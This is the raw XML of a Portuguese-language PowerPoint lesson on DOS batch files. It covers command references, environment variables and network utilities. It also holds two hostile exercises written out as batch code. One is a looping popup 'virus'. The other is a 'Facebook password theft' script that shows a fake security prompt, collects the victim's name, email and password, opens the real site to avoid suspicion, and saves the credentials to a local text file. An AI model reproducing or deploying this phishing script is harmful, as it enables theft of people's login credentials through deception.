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0" r:id="rId3"/>
    <p:sldId id="273" r:id="rId4"/>
    <p:sldId id="285" r:id="rId5"/>
    <p:sldId id="272" r:id="rId6"/>
    <p:sldId id="286" r:id="rId7"/>
    <p:sldId id="287" r:id="rId8"/>
    <p:sldId id="288" r:id="rId9"/>
    <p:sldId id="289" r:id="rId10"/>
    <p:sldId id="263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74511-401F-41B4-B5E3-BADF1A75582F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7443C-A3FB-40A2-BF9F-951E87DE16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8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7443C-A3FB-40A2-BF9F-951E87DE16E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0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9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60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3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6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473C-FA97-4253-A4ED-6C0437146285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8954-4320-4507-8F2D-1BB8C0F6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8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1315948" y="692696"/>
            <a:ext cx="5238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 </a:t>
            </a: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DOS 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482627" y="2348880"/>
            <a:ext cx="691458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 DOS, sigla para Disk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="24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Operating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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System ou sistema operacional em disco é um acrónimo de um sistema operacional relacionados a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="24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linha IBM PC entre 1981 e 1995.  Até hoje ele é parte integrante do  Microsoft Windows.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9512" y="794892"/>
            <a:ext cx="7828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Vamos</a:t>
            </a:r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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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riar</a:t>
            </a:r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um virus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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</a:t>
            </a:r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batch ???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98682" y="3429000"/>
            <a:ext cx="3801041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@ECHOO OFF</a:t>
            </a:r>
          </a:p>
          <a:p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:REPETE</a:t>
            </a:r>
          </a:p>
          <a:p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MSG*CLICK EM MIM</a:t>
            </a:r>
          </a:p>
          <a:p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GOTO REPETE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1560" y="2231029"/>
            <a:ext cx="679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CRIE UM ARQUIVO NO BLOCO DE NOTAS  E SALVE COM EXTENSÃO BAT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45744"/>
            <a:ext cx="59997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EXERCÍCIO 2</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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381328"/>
            <a:ext cx="43302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51520" y="548680"/>
            <a:ext cx="6285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Roubo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de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="54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senha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do </a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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34412" y="2283254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@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off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title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Facebook</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Arial Black" pitchFamily="34" charset="0"/>
            </a:endParaRP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cls</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Arial Black" pitchFamily="34" charset="0"/>
            </a:endParaRP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.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– Para sua segurança o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Facebook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 esta protegido !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.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-- E preciso entrar com seu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email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e senha de acesso !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.</a:t>
            </a:r>
          </a:p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set /p nome=Nome:</a:t>
            </a:r>
          </a:p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set /p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us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=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Email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:</a:t>
            </a:r>
          </a:p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set /p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pass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=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Email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Passwor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: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msg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* Obrigado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voce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agora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ja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pode usar o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Facebook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.</a:t>
            </a:r>
          </a:p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start iexplore.exe  http://www.facebook.com.br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echo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dia %date% Hora %time%  %n%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logon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no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email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: %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us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% Nome: %nome%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Cd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\ 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Md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bat</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Arial Black" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p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 e 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password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:%</a:t>
            </a:r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pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>%    &gt;"c:\bat\%n%.txt"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Arial Black" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2" descr="http://www.vanderbilt.edu/recreationandwellnesscenter/wellness/wp-content/uploads/Cracked-Facebook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0"/>
            <a:ext cx="2170798" cy="21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1315948" y="692696"/>
            <a:ext cx="5238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 PODER DO BAT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465723" y="2348880"/>
            <a:ext cx="7322481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Os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arquivos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batch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surgiram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como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uma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forma de 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inicializar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comandos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e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funções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através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do DOS.</a:t>
            </a:r>
          </a:p>
          <a:p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Apesar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das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constantes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evoluções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do windows ,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programas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e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comandos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em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DOS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ainda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estão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lá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ocultos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esperando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que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você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os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encontre</a:t>
            </a:r>
            <a:r>
              <a:rPr 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!!! </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="28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Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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Char char="•"/>
            </a:pP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1315948" y="692696"/>
            <a:ext cx="5238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ACESSO CMD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310567-8ACA-4CCA-8803-C5AD37CF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48880"/>
            <a:ext cx="6076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1315948" y="692696"/>
            <a:ext cx="5238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ACESSO CMD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659D12-3533-436C-BE5A-BCCCA6A2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71687"/>
            <a:ext cx="5133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971600" y="692696"/>
            <a:ext cx="58863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PROGRAMAÇÃO EM LOTE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577577" y="1837268"/>
            <a:ext cx="7322481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ECHO: Escreve na tela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ECHO OFF: Oculta informações e o código executado pelo sistema.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ECHO ON: Exibe informações e o código executado pelo sistema.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ECHO.: Salta uma linha.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@ECHO: Faz com que o prompt fique oculto durante toda execução.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SET: Cria variável que pode ser referenciada através de %variável%.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:b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artic.com.br/imgs/mural/xc/xconnect_/anonymous-to-shisu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65304"/>
            <a:ext cx="60623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FF6A6C8-289E-455C-B3BD-53485ECBAFC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="692696"/>
            <a:ext cx="58863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PROGRAMAÇÃO EM LOTE</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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611560" y="1588012"/>
            <a:ext cx="7322481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CLS: Limpa o console.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IF e ELSE: Estruturas condicionais.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GOTO: Avança até determinado trecho do lote.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FOR: Estrutura de repetição.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PAUSE: Faz uma pausa, e exibe: “Pressione qualquer tecla para continuar.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>REM: Utilizado para fazer comentários.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START: Inicializa um aplicativo ou programa.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MOVE: Move (recorta) um arquivo de um diretório para outro.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:b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4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495270" y="302359"/>
            <a:ext cx="7322481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EXIST - verifica se algo existe, uma variável por exemplo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:NOME - ponto de parada que pode ser chamado através do GOTO NOME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FOR - estrutura de repetição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PAUSE - faz uma pausa na execução do arquivo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comando &gt; NUL - oculta a mensagem de uma linha ou comando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MSG * - mostra um balão de aviso na tela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START - inicializa um aplicativo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CALL "%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>variavel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%" - abre um arquivo/programa com espaços no nome</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IF NOT DEFINED "%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>variavel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%" GOTO comando - se a variável não estiver definida vai para uma seção específica do arquivo</a:t>
            </a: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4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179512" y="836712"/>
            <a:ext cx="7322481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username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>% - nome da conta do usuário logado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userprofile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>% - pasta do perfil do usuário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temp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>% - pasta temporária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windir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>% - pasta de instalação do Windows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systemroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>% - pasta raiz do sistema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%time% - hora do sistema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%date% - data do sistema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homedrive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>% - letra do drive com o diretório de usuários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userdomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>% - nome do domínio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systemdrive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>% - letra do drive onde o sistema está instalado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%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>% - retorna o caminho do .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bat</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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3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6F679D7-F3C5-4B64-BCDE-7C7933F69AA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="548680"/>
            <a:ext cx="7322481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Ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  - Verifica funcionamento da internet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err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ipconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – Veria a qual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> você está conectado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e configurações de rede.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err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tracert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – Mostra o caminho do ponto A ao B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1"/>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>  -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1"/>
              <a:t>an</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- Status da porta e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ip´s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> conectados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err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>taskkill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /f /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>im</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> processo.exe – Finaliza um determinado processo.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err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sfc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>scannow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Corrige arquivos do sistema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1046355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3A5B2455484D479E0C4EAD485121E7" ma:contentTypeVersion="6" ma:contentTypeDescription="Crie um novo documento." ma:contentTypeScope="" ma:versionID="b215a547b7dca46eadd9b24b86a244e6">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="a67697ac-6eee-4b3f-8353-ff6c4c00cdbf" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="b6ed0088354edd2318dc74c646514ed4" ns2:_="">
    <xsd:import namespace="a67697ac-6eee-4b3f-8353-ff6c4c00c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697ac-6eee-4b3f-8353-ff6c4c00c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4745BF-3BF6-486B-991D-E8C20BF55386}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{567AF5E0-C431-4691-A986-CFDA8CDCEBE3}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{05718214-9BBE-4495-B8F8-AF2D58DB85D2}"/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662</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Apresentação na tela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 EDUARDO DOS SANTOS</cp:lastModifiedBy>
  <cp:revision>25</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-11-09T19:28:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-01T23:59:28Z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0x0101003A3A5B2455484D479E0C4EAD485121E7</vt:lpwstr>
  </property>
</Properties>
</file>